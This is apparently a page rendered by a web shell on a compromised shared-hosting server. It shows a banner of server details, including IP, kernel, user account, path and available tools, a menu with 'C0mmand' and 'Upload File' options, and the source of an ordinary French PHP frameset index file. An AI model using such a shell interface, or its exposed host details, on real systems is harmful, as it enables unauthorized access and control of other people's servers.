|
Server IP : 10.128.40.6 / Your IP : 216.73.216.233 Web Server : Apache System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : logmcpe ( 111175) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/logmcpe/www/MCPRO/temp/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
ini_set('display_errors','on');
error_reporting(E_ALL);
include_once 'code/init.php';
;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>MC PRO </title>
<link rel="shortcut icon" href="favicon.ico" />
</head>
<frameset cols="217,*" frameborder="no">
<?
if($bureau == 7)
{
?>
<frame name="menu" src="menu_parid.php">
<?
}
else
{
?>
<frame name="menu" src="menu.php">
<?
}
?>
<frameset rows="55,*" frameborder="no">
<frame src="top.php" name="ident" scrolling="no">
<?
if($bureau == 7)
{
?>
<frame src="accueil_paris.php" name="main" class="body_contenu">
<?
}
else
{
?>
<frame src="accueil.php" name="main" class="body_contenu">
<?
}
?>
</frameset>
</frameset>
<noframes></noframes>
</html>